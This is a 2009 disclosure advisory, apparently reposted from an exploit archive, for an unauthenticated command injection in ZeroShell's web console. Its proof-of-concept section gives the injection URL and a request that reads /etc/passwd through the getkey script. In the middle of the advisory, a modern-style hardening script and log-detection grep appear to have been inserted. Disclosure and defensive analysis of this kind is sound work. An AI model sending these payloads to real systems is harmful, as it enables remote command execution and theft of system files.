ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability

09 Feb 2009 00:00:00 | Reported by ikki | Type: zdt | Source: 0day.today

ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability in web console due to improper input validation

Code
==========================================================
ZeroShell <= 1.0beta11 Remote Code Execution Vulnerability
==========================================================
----------------------------------------------
Original Advisory: 

  

  ======================================================================== 
  ZeroShell <= 1.0beta11 Remote Code Execution
  ========================================================================
   
  Affected Software : ZeroShell <= 1.0beta11
  Severity          : High
  Local/Remote      : Remote
  Author            : Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com
  Advisory URL      : http://www.ikkisoft.com/stuff/LC-2009-01.txt 
  
  [Summary]
  
  ZeroShell (http://www.zeroshell.net/eng/) is a small Linux distribution 
  for servers and embedded devices. This Linux distro can be configured 
  and managed with an easy to use web console.
  
  ZeroShell is prone to an arbitrary code execution vulnerability due to
  an improper input validation mechanism. An aggressor may abuse this 
  weakness in order to compromise the entire system. 
  Authentication is not required in order to exploit this flaw.

  [Vulnerability Details]
  
  The ZeroShell web console uses a CGI program and several bash scripts 
  to provide all administrative functions. An improper input validation 
  mechanism permits the injection of arbitrary system commands.
  An unauthenticated user may invoke a function to retrieve all x509 
  certificates present in the repository, using the following GET request:
  https://<IP>/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user
  
  The parameter "type" is used to distinguish between users, CA and host 
  certificates. Unfortunately, this parameter is passed to the following 
  code without input validation at all:
  
  <-- cut here -->
  TYPE="$1"
  cd "$SSLDIR/certs" || exit 1
  ls *_${TYPE}.pem |awk -F"_$TYPE.pem" -v"TYPE=$TYPE" '{
  <-- cut here -->
  
  An aggressor may easily break out of the hardcoded command and append
  arbitrary system commands. Under the default system configuration, these
  commands are executed as the low-privileged "apache" user.
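The root cause above is a request parameter being spliced into a shell command line. The following is an added example, not ZeroShell's own code or the vendor's patch: it shows the hardened shape of that certificate listing (an allow-list check of the type value, then a quoted glob and parameter expansion instead of `ls | awk`, so the value is never re-parsed as code) and, on the defender side, a check over constructed access-log lines that flags x509List requests whose `type` value is not a plain alphabetic token. The directory layout `<name>_<type>.pem`, the allow-list of `user`, `CA` and `host` (the three types the advisory names), and the sample log lines are assumptions for the example.

```shell
#!/bin/sh
# Added example, not ZeroShell's code. Hardened replacement for the unvalidated
# 'ls *_${TYPE}.pem | awk ...' pattern quoted in the advisory, plus a log check.
# Assumptions: certificates live under a directory as <name>_<type>.pem, and the
# only legitimate values of "type" are the three the advisory names.

# Succeed only if $1 is an allow-listed certificate type. Anything else,
# including the advisory's '*";...;"' payload shape, is rejected before it
# can reach a shell command line.
valid_cert_type() {
    case "$1" in
        user|CA|host) return 0 ;;
        *)            return 1 ;;
    esac
}

# List certificate names (the part before _<type>.pem) in directory $1 for
# type $2. Uses a quoted glob and parameter expansion instead of 'ls | awk',
# so the type value is data for pattern matching, never re-parsed as code.
list_certs() {
    certdir="$1"
    ctype="$2"
    valid_cert_type "$ctype" || { echo "invalid certificate type" >&2; return 2; }
    suffix="_${ctype}.pem"
    for f in "$certdir"/*"$suffix"; do
        [ -e "$f" ] || continue        # glob did not match: skip the literal pattern
        base=${f##*/}
        printf '%s\n' "${base%"$suffix"}"
    done
    return 0
}

# Detection side: print access-log lines for x509List requests whose "type"
# value is not a plain alphabetic token (the legitimate values above are).
flag_x509list_requests() {
    grep 'Action=x509List' | grep -Ev 'type=[A-Za-z]+( |&)'
}

# Constructed sample log lines (not from the advisory): a legitimate request
# followed by one carrying the injection shape the advisory describes, with
# the command position left as the placeholder CMD.
SAMPLE_LOG='10.0.0.5 - - [09/Feb/2009:00:00:00 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=user HTTP/1.1" 200 512
10.0.0.9 - - [09/Feb/2009:00:00:01 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;CMD;%22 HTTP/1.1" 200 128'

# Stand-alone demo (run with DEMO=1): build a throw-away cert directory and
# exercise both the listing and the log check.
if [ "${DEMO:-0}" = 1 ]; then
    d=$(mktemp -d)
    : > "$d/alice_user.pem"; : > "$d/root_CA.pem"
    list_certs "$d" user
    list_certs "$d" '*";CMD;"' || echo "rejected (status $?)"
    printf '%s\n' "$SAMPLE_LOG" | flag_x509list_requests
    rm -rf "$d"
fi
```

Run it as `DEMO=1 sh hardened_x509list.sh` to see the listing succeed for `user`, the injection-shaped value rejected with status 2, and only the second sample log line flagged. The same allow-list check belongs at the CGI layer as well, so that a rejected value never reaches any script; the grep is a cheap retrospective check for historic logs, not a substitute for the fix.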
  
  [Proof of Concept Exploit]
  
  /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;<CMD HERE>;%22
  
  In addition to plain Unix commands, it is possible to abuse the 
  ZeroShell scripts themselves. For instance, the "getkey" script can be
  used to retrieve arbitrary files from the system, whose content is then
  returned in the HTML page.
  
  {HTTP REQUEST}
  GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
  /root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
  Host: <IP>

  [Fix Information]

  The vendor has published a patch for the release 1.0beta11 only.
  http://www.zeroshell.net/eng/patch-details/#C100

  The new release (1.0beta12) will be available soon.

  [Time Table]

  08/01/2009 - Vendor notified.
  08/01/2009 - Vendor response.
  11/01/2009 - Vendor patch release.
  09/02/2009 - Public disclosure.

  [Legal Notices]

  The information in the advisory is believed to be accurate at the 
  time of publishing based on currently available information. 
  This information is provided as-is, as a free service to the community. 
  There are no warranties with regard to this information.
  The author does not accept any liability for any direct, 
  indirect, or consequential loss or damage arising from use of, 
  or reliance on, this information.
  Permission is hereby granted for the redistribution of this alert,
  provided that the content is not altered in any way, except 
  reformatting, and that due credit is given.
  
  This vulnerability has been disclosed in accordance with the RFP 
  Full-Disclosure Policy v2.0, available at:
  http://www.wiretrip.net/rfp/policy.html





#  0day.today [2017-12-31]  #
